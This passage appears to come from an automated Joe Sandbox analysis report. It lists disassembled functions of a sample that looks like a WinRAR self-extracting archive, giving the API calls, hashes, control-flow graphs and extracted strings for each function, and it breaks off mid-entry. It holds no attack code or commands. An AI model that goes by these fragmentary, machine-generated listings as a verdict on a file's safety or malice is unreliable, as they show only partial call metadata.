                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A728
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A734
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 42610566-0
                                                                                                                    • Opcode ID: 7ff94456c2c656232a8e5e15024297a6309baaedacfd0387b0e74bc734f2262c
                                                                                                                    • Instruction ID: d45617564fcbb037565c1117f8b33185c08013e4d014eb86e477324fa9044c1e
                                                                                                                    • Opcode Fuzzy Hash: 7ff94456c2c656232a8e5e15024297a6309baaedacfd0387b0e74bc734f2262c
                                                                                                                    • Instruction Fuzzy Hash: A5415B72900515ABCB25DF64DCC8AEABBB8BB49350F1441A6E59EE3200D774AED4CF90
                                                                                                                    Function 00E57DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00E57DC4,00000000,00E6C300,0000000C,00E57F1B,00000000,00000002,00000000), ref: 00E57E0F
                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00E57DC4,00000000,00E6C300,0000000C,00E57F1B,00000000,00000002,00000000), ref: 00E57E16
                                                                                                                    • ExitProcess.KERNEL32 ref: 00E57E28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: 6d5d77448423d7529e7eed775598b5349701586e7ce31a8afee96c9edffe1479
                                                                                                                    • Instruction ID: 9fbe120ffea5a73630bce70f9056265ca2d2e4a0a03ddf904ca48dca20e997be
                                                                                                                    • Opcode Fuzzy Hash: 6d5d77448423d7529e7eed775598b5349701586e7ce31a8afee96c9edffe1479
                                                                                                                    • Instruction Fuzzy Hash: D8E0BF31004244EFCF516F65ED0A94A7F6AEB50386B005858FC55BA172CF75DE69CA90
                                                                                                                    Function 00E3848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 0384d212e54373aa4a62efaf0e66d87846abfb595ef742397b67e159f5fc4079
                                                                                                                    • Instruction ID: 15e796c3779e2a5901e6b45f3d4064697cf479199e84ceab3b8c07ba9dc41e52
                                                                                                                    • Opcode Fuzzy Hash: 0384d212e54373aa4a62efaf0e66d87846abfb595ef742397b67e159f5fc4079
                                                                                                                    • Instruction Fuzzy Hash: 92821C70904345AEDF15DF64C999BFABFB9AF05304F0861B9F849BB142CB715A88CB60
                                                                                                                    Function 00E4B7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E4B7E5
                                                                                                                      • Part of subcall function 00E31316: GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
                                                                                                                      • Part of subcall function 00E31316: SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E4B8D1
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4B8EF
                                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 00E4B902
                                                                                                                    • TranslateMessage.USER32(?), ref: 00E4B910
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00E4B91A
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00E4B93D
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00E4B960
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 00E4B983
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E4B99E
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E635F4), ref: 00E4B9B1
                                                                                                                      • Part of subcall function 00E4D453: _wcschr.LIBVCRUNTIME ref: 00E4D45C
                                                                                                                      • Part of subcall function 00E4D453: _wcslen.LIBCMT ref: 00E4D47D
                                                                                                                    • SetFocus.USER32(00000000), ref: 00E4B9B8
                                                                                                                    • _swprintf.LIBCMT ref: 00E4BA24
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                      • Part of subcall function 00E4D4D4: GetDlgItem.USER32(00000068,00E8FCB8), ref: 00E4D4E8
                                                                                                                      • Part of subcall function 00E4D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00E4AF07,00000001,?,?,00E4B7B9,00E6506C,00E8FCB8,00E8FCB8,00001000,00000000,00000000), ref: 00E4D510
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E4D51B
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E635F4), ref: 00E4D529
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E4D53F
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E4D559
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E4D59D
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E4D5AB
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E4D5BA
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E4D5E1
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E643F4), ref: 00E4D5F0
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00E4BA68
                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00E4BA90
                                                                                                                    • GetTickCount.KERNEL32 ref: 00E4BAAE
                                                                                                                    • _swprintf.LIBCMT ref: 00E4BAC2
                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 00E4BAF4
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00E4BB43
                                                                                                                    • _swprintf.LIBCMT ref: 00E4BB7C
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00E4BBD0
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00E4BBEA
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00E4BC47
                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00E4BC6F
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00E4BCB9
                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00E4BCE2
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E4BCEB
                                                                                                                    • _swprintf.LIBCMT ref: 00E4BD1E
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E4BD7D
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,00E635F4), ref: 00E4BD94
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00E4BD9D
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00E4BDAC
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E4BDBB
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E4BE68
                                                                                                                    • _wcslen.LIBCMT ref: 00E4BEBE
                                                                                                                    • _swprintf.LIBCMT ref: 00E4BEE8
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00E4BF32
                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00E4BF4C
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 00E4BF55
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00E4BF6B
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 00E4BF85
                                                                                                                    • SetWindowTextW.USER32(00000000,00E7A472), ref: 00E4BFA7
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00E4C007
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E4C01A
                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00E4C0BD
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00E4C197
                                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00E4C1D9
                                                                                                                      • Part of subcall function 00E4C73F: __EH_prolog.LIBCMT ref: 00E4C744
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E4C1FD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<$STARTDLG$^$__tmp_rar_sfx_access_check_%u$h$winrarsfxmappingfile.tmp$Q
                                                                                                                    • API String ID: 3829768659-4153176784
                                                                                                                    • Opcode ID: be2f9ccb0b45789bbdef90d0d99649f8a1bae9c6789f4d389fa7c992c06b6fc6
                                                                                                                    • Instruction ID: 015dfd9edd3ab2fa1af22d49f009f01692a09aeda8344db70aa54925d99b57c2
                                                                                                                    • Opcode Fuzzy Hash: be2f9ccb0b45789bbdef90d0d99649f8a1bae9c6789f4d389fa7c992c06b6fc6
                                                                                                                    • Instruction Fuzzy Hash: 9E421A71985344BEEB21DB71AC4EFBE7BBC9B01704F101056F648B61E2DBB49A48CB21
                                                                                                                    Function 00E40863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 269 e40863-e40886 call e4ec50 GetModuleHandleW 272 e408e7-e40b48 269->272 273 e40888-e4089f GetProcAddress 269->273 276 e40c14-e40c40 GetModuleFileNameW call e3c29a call e40602 272->276 277 e40b4e-e40b59 call e575fb 272->277 274 e408a1-e408b7 273->274 275 e408b9-e408c9 GetProcAddress 273->275 274->275 278 e408e5 275->278 279 e408cb-e408e0 275->279 291 e40c42-e40c4e call e3b146 276->291 277->276 285 e40b5f-e40b8d GetModuleFileNameW CreateFileW 277->285 278->272 279->278 289 e40b8f-e40b9b SetFilePointer 285->289 290 e40c08-e40c0f CloseHandle 285->290 289->290 292 e40b9d-e40bb9 ReadFile 289->292 290->276 298 e40c50-e40c5b call e4081b 291->298 299 e40c7d-e40ca4 call e3c310 GetFileAttributesW 291->299 292->290 295 e40bbb-e40be0 292->295 297 e40bfd-e40c06 call e40371 295->297 297->290 306 e40be2-e40bfc call e4081b 297->306 298->299 308 e40c5d-e40c7b CompareStringW 298->308 309 e40ca6-e40caa 299->309 310 e40cae 299->310 306->297 308->299 308->309 309->291 312 e40cac 309->312 313 e40cb0-e40cb5 310->313 312->313 314 e40cb7 313->314 315 e40cec-e40cee 313->315 316 e40cb9-e40ce0 call e3c310 GetFileAttributesW 314->316 317 e40cf4-e40d0b call e3c2e4 call e3b146 315->317 318 e40dfb-e40e05 315->318 323 e40ce2-e40ce6 316->323 324 e40cea 316->324 328 e40d73-e40da6 call e34092 AllocConsole 317->328 329 e40d0d-e40d6e call e4081b * 2 call e3e617 call e34092 call e3e617 call e4a7e4 317->329 323->316 326 e40ce8 323->326 324->315 326->315 334 e40df3-e40df5 ExitProcess 328->334 335 e40da8-e40ded GetCurrentProcessId AttachConsole call e53e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->335 329->334 335->334
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 00E4087C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E4088E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E408BF
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E40B69
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E40B83
                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E40B93
                                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,|<,00000000), ref: 00E40BB1
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E40C09
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E40C1E
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<,?,00000000,?,00000800), ref: 00E40C72
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<,00000800,?,00000000,?,00000800), ref: 00E40C9C
                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,D=,00000800), ref: 00E40CD8
                                                                                                                      • Part of subcall function 00E4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E40836
                                                                                                                      • Part of subcall function 00E4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E3F2D8,Crypt32.dll,00000000,00E3F35C,?,?,00E3F33E,?,?,?), ref: 00E40858
                                                                                                                    • _swprintf.LIBCMT ref: 00E40D4A
                                                                                                                    • _swprintf.LIBCMT ref: 00E40D96
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                    • AllocConsole.KERNEL32 ref: 00E40D9E
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00E40DA8
                                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00E40DAF
                                                                                                                    • _wcslen.LIBCMT ref: 00E40DC4
                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00E40DD5
                                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00E40DDC
                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00E40DE7
                                                                                                                    • FreeConsole.KERNEL32 ref: 00E40DED
                                                                                                                    • ExitProcess.KERNEL32 ref: 00E40DF5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                    • String ID: (=$,<$,@$0?$0A$4B$8>$D=$DXGIDebug.dll$H?$H@$HA$P>$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=$`@$d?$dA$dwmapi.dll$h=$h>$kernel32$uxtheme.dll$|<$|?$|@$<$>$?$@$A
                                                                                                                    • API String ID: 1207345701-31210346
                                                                                                                    • Opcode ID: c572cde83669d1618811d48dc93805b9882a77722b422afd6f6122f61ceaa2ca
                                                                                                                    • Instruction ID: 4e5efc18142cc1301a4e8d8e399ad0e2fd0175958e0c4f1b8fd611fcc6978593
                                                                                                                    • Opcode Fuzzy Hash: c572cde83669d1618811d48dc93805b9882a77722b422afd6f6122f61ceaa2ca
                                                                                                                    • Instruction Fuzzy Hash: FED186B1548344AFD3319F60B84AB9FBAE8ABC5784F10691DF285B6191C7B0864CCB62
                                                                                                                    Function 00E4C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 348 e4c73f-e4c757 call e4eb78 call e4ec50 353 e4d40d-e4d418 348->353 354 e4c75d-e4c787 call e4b314 348->354 354->353 357 e4c78d-e4c792 354->357 358 e4c793-e4c7a1 357->358 359 e4c7a2-e4c7b7 call e4af98 358->359 362 e4c7b9 359->362 363 e4c7bb-e4c7d0 call e41fbb 362->363 366 e4c7d2-e4c7d6 363->366 367 e4c7dd-e4c7e0 363->367 366->363 368 e4c7d8 366->368 369 e4c7e6 367->369 370 e4d3d9-e4d404 call e4b314 367->370 368->370 371 e4ca7c-e4ca7e 369->371 372 e4c7ed-e4c7f0 369->372 373 e4c9be-e4c9c0 369->373 374 e4ca5f-e4ca61 369->374 370->358 385 e4d40a-e4d40c 370->385 371->370 377 e4ca84-e4ca8b 371->377 372->370 379 e4c7f6-e4c850 call e4a64d call e3bdf3 call e3a544 call e3a67e call e36edb 372->379 373->370 378 e4c9c6-e4c9d2 373->378 374->370 376 e4ca67-e4ca77 SetWindowTextW 374->376 376->370 377->370 381 e4ca91-e4caaa 377->381 382 e4c9d4-e4c9e5 call e57686 378->382 383 e4c9e6-e4c9eb 378->383 434 e4c98f-e4c9a4 call e3a5d1 379->434 386 e4cab2-e4cac0 call e53e13 381->386 387 e4caac 381->387 382->383 390 e4c9f5-e4ca00 call e4b48e 383->390 391 e4c9ed-e4c9f3 383->391 385->353 386->370 404 e4cac6-e4cacf 386->404 387->386 395 e4ca05-e4ca07 390->395 391->395 400 e4ca12-e4ca32 call e53e13 call e53e3e 395->400 401 e4ca09-e4ca10 call e53e13 395->401 422 e4ca34-e4ca3b 400->422 423 e4ca4b-e4ca4d 400->423 401->400 408 e4cad1-e4cad5 404->408 409 e4caf8-e4cafb 404->409 412 e4cb01-e4cb04 408->412 414 e4cad7-e4cadf 408->414 411 e4cbe0-e4cbee call e40602 409->411 409->412 432 e4cbf0-e4cc04 call e5279b 411->432 416 e4cb06-e4cb0b 412->416 417 e4cb11-e4cb2c 412->417 414->370 420 e4cae5-e4caf3 call e40602 414->420 416->411 416->417 435 e4cb76-e4cb7d 417->435 436 e4cb2e-e4cb68 417->436 420->432 429 e4ca42-e4ca4a call e57686 422->429 430 e4ca3d-e4ca3f 422->430 423->370 431 e4ca53-e4ca5a call e53e2e 423->431 429->423 430->429 431->370 447 e4cc06-e4cc0a 432->447 448 e4cc11-e4cc62 call e40602 call e4b1be GetDlgItem SetWindowTextW SendMessageW call e53e49 432->448 452 e4c855-e4c869 SetFileAttributesW 434->452 453 e4c9aa-e4c9b9 call e3a55a 434->453 441 e4cb7f-e4cb97 call e53e13 435->441 442 e4cbab-e4cbce call e53e13 * 2 435->442 471 e4cb6c-e4cb6e 436->471 472 e4cb6a 436->472 441->442 458 e4cb99-e4cba6 call e405da 441->458 442->432 476 e4cbd0-e4cbde call e405da 442->476 447->448 454 e4cc0c-e4cc0e 447->454 482 e4cc67-e4cc6b 448->482 459 e4c90f-e4c91f GetFileAttributesW 452->459 460 e4c86f-e4c8a2 call e3b991 call e3b690 call e53e13 452->460 453->370 454->448 458->442 459->434 469 e4c921-e4c930 DeleteFileW 459->469 491 e4c8a4-e4c8b3 call e53e13 460->491 492 e4c8b5-e4c8c3 call e3bdb4 460->492 469->434 475 e4c932-e4c935 469->475 471->435 472->471 479 e4c939-e4c965 call e34092 GetFileAttributesW 475->479 476->432 489 e4c937-e4c938 479->489 490 e4c967-e4c97d MoveFileW 479->490 482->370 486 e4cc71-e4cc85 SendMessageW 482->486 486->370 489->479 490->434 493 e4c97f-e4c989 MoveFileExW 490->493 491->492 498 e4c8c9-e4c908 call e53e13 call e4fff0 491->498 492->453 492->498 493->434 498->459
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E4C744
                                                                                                                      • Part of subcall function 00E4B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00E4B3FB
                                                                                                                      • Part of subcall function 00E4AF98: _wcschr.LIBVCRUNTIME ref: 00E4B033
                                                                                                                    • _wcslen.LIBCMT ref: 00E4CA0A
                                                                                                                    • _wcslen.LIBCMT ref: 00E4CA13
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E4CA71
                                                                                                                    • _wcslen.LIBCMT ref: 00E4CAB3
                                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 00E4CBFB
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 00E4CC36
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00E4CC46
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,00E7A472), ref: 00E4CC54
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E4CC7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                                    • String ID: %s.%d.tmp$<br>$<$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$
                                                                                                                    • API String ID: 986293930-3467919732
                                                                                                                    • Opcode ID: 13bb96e2199fad27fd3d3924e93d472a126b1c58f8c25a792f43f41a41af4b59
                                                                                                                    • Instruction ID: 24237bfd366e24eae285c7abfb166d6d11f9af1be3e90e558bba5e111b18b438
                                                                                                                    • Opcode Fuzzy Hash: 13bb96e2199fad27fd3d3924e93d472a126b1c58f8c25a792f43f41a41af4b59
                                                                                                                    • Instruction Fuzzy Hash: 6AE16472900218AADB24DBA1EC85EEE73BCEB05354F1454A6F649F3051EF749F888F61
                                                                                                                    Function 00E3DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E3DA70
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E3DA91
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E3DAAC
                                                                                                                      • Part of subcall function 00E3C29A: _wcslen.LIBCMT ref: 00E3C2A2
                                                                                                                      • Part of subcall function 00E405DA: _wcslen.LIBCMT ref: 00E405E0
                                                                                                                      • Part of subcall function 00E41B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E3BAE9,00000000,?,?,?,0001047E), ref: 00E41BA0
                                                                                                                    • _wcslen.LIBCMT ref: 00E3DDE9
                                                                                                                    • __fprintf_l.LIBCMT ref: 00E3DF1C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
